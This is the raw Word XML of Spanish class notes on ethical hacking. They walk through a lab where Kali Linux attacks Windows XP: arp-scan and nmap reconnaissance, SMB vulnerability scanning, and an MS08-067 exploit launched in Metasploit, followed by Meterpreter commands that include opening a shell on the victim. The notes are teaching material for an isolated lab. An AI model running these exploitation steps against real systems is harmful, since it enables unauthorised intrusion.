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055A6" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1200" w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>ETHICAL HACKING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A72C388" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Apuntes de Clase — Kali Linux vs Windows XP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC4068F" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">Materia: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Ethical</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Hacking  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">  Entorno: Kali Linux (atacante) + Windows XP (víctima)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3C60BB" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:r w:rsidRPr="00A5184A">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D57DC65" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sesión 1 — 08 de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Mayo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> de 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAEEF33" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Configuración del Laboratorio Virtual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581B4F91" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Entorno: dos máquinas virtuales en red interna.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC857ED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r w:rsidRPr="00A5184A">
        <w:t>Máquina atacante: Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E1E84D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r w:rsidRPr="00A5184A">
        <w:t>Máquina víctima: Windows XP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F99BD93" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="180A5D96" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>FASE 1 — Reconocimiento / Descubrimiento de Hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B50B46" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">Descubrimiento con ARP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C7E56B9" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">ARP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> permite detectar qué equipos están activos en la red local enviando paquetes ARP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D1A5F7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02B3B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D8B565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sudo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arp-scan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-I eth1 --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localnet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Escanea la interfaz eth1 específica sudo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arp-scan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-l                     # Escanea toda la red local (todas las interfaces)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43138C3E" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF81053" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Resultados obtenidos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A971CEA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r w:rsidRPr="00A5184A">
        <w:t>192.168.56.101 → Windows XP (víctima)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223D11E7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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>192.168.56.50  →</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> Kali Linux (atacante)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE49D0B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62668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96578" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00A5184A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">💡 Dato clave: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A5184A">
              <w:t>Se puede distinguir el sistema operativo por el valor TTL en el ping: Linux usa TTL=64, Windows usa TTL=128.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="128DBE82" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D23813" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">FASE 2 — Escaneo de Puertos con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35BE093E" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> (Network </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Mapper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>) es la herramienta estándar para descubrir puertos abiertos, servicios y versiones en un objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56756F48" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723AFC3D" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Opciones más usadas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78FCB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EB9D41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# Escaneo SYN (rápido, silencioso) — solo top 1000 puertos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nmap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-T5 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192.168.56.101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Escaneo de TODOS los puertos (1–65535) sudo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nmap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-T5 -p- 192.168.56.101  # Puerto específico sudo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nmap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-p 80 192.168.56.101  # Rango de puertos sudo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nmap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-p 1-10000 192.168.56.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="115634C7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57A3E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371DD" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00A5184A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">🔎 Parámetros: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A5184A">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t>sS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t xml:space="preserve"> = SYN </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t>Scan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t xml:space="preserve"> (semiabierto, no completa la conexión TCP).  -T5 = velocidad máxima (agresiva).  -p- = todos los 65535 puertos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46F8B5BE" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E610A59" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Puerto 80 abierto = servidor web activo en la máquina víctima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD6C761" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79ABC647" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>FASE 3 — Detección de Versiones y Servicios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE27D51" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Una vez identificados los puertos abiertos, el siguiente paso es determinar qué versión de software corre en cada uno. Esto permite buscar vulnerabilidades conocidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EE5915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06D63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DC2723" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pP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nmap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sV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-T5 192.168.56.101 #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sV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: detecta versiones de los servicios en cada puerto abierto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="644F373D" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E071745" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Servicios detectados frecuentemente en Windows XP: Apache (HTTP), MySQL, VNC, SMB (puerto 445).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0114926E" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D4229B5" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>FASE 3b — Análisis del Puerto 445 (SMB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E46AA85" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">SMB (Server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> Block) es el protocolo de compartición de archivos de Windows. En Windows XP sin parchear, es altamente vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38088446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2DCA8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C74C65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# Detectar versión del protocolo SMB habilitada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nmap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--script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smb-protocols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-p 445 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192.168.56.101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Buscar vulnerabilidades conocidas en SMB (incluye MS08-067,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EternalBlue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, etc.)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nmap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--script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vuln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-p 445 192.168.56.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D7BCB69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61DE2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74EFE" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00A5184A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️ Importante: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A5184A">
              <w:t>La máquina Windows XP NO debe tener acceso a internet en el laboratorio. Esto evita actualizaciones accidentales y contiene el entorno controlado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22073B7B" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A81B44E" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">FASE 4 — Análisis y Explotación con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CEEC6EA" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">¿Qué es </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F51C9C9" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> Framework es la plataforma de explotación más usada en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">. Permite buscar, configurar y lanzar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> contra objetivos vulnerables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB7087F" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BCDE03C" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Componentes principales:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74200714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 w:rsidRPr="00A5184A">
        <w:t>Exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>: código que aprovecha una vulnerabilidad específica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBC8DB2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 w:rsidRPr="00A5184A">
        <w:t>Payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">: código que se ejecuta en el sistema víctima tras el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> (ej. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9489DA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r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">NOP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>sled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">: relleno de instrucciones NOP para alinear el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> en memoria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C796621" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="084FFC73" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Iniciar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Metasploit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7C9A11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947003" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pP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msfconsole</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DA5444F" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="083A6D89" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">Buscar y seleccionar un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> — MS08-067</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4488C449" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>MS08-067 es una vulnerabilidad crítica en el servicio 'Servidor' de Windows (netapi32.dll), presente en Windows XP sin parchear. Permite ejecución remota de código sin autenticación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDF021B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3818D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609AA0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# Buscar el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exploit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dentro de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Metasploit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msf6 &gt;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search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MS08-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067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Seleccionar el módulo msf6 &gt; use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exploit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windows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smb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/ms08_067_netapi  # Ver opciones requeridas msf6 &gt; show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options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# Configurar la IP del objetivo (RHOSTS = Remote HOST) msf6 &gt; set RHOSTS 192.168.56.101  # Ver información detallada del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exploit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msf6 &gt; show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info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# Verificar si el objetivo es vulnerable (opcional) msf6 &gt;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check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# Lanzar el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exploit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msf6 &gt;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exploit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# también puede usarse: run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CFBBD9D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08607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5EC21" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00A5184A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">🎯 Resultado esperado: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A5184A">
              <w:t xml:space="preserve">Si el </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t>exploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t xml:space="preserve"> tiene éxito, se obtiene una sesión de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t>Meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t>: una consola interactiva dentro de la máquina víctima.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="786A7727" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="276A0C7B" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">Comandos en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>post-explotación</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6D8128" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> es un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> avanzado que corre en memoria del sistema víctima, sin escribir archivos en disco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4600B765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20984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886BB2" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pP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meterpreter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sysinfo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# Información del sistema (OS,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hostname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, arquitectura)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meterpreter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ipconfig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# Interfaces de red de la máquina víctima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meterpreter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help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# Lista completa de comandos disponibles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meterpreter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getuid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# Ver con qué usuario/privilegios estamos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meterpreter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shell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# Abrir una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shell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de CMD en la víctima</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C3C73EF" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06385139" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">Herramienta Adicional — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>WhatWeb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3990B06E" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>WhatWeb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> analiza la arquitectura y tecnologías de un servidor web: CMS, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>, servidor HTTP, lenguaje de programación, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECD32B1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2E5839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1E9C20" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pP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whatweb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http://192.168.56.101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whatweb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http://192.168.56.101 -v   # Modo detallado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
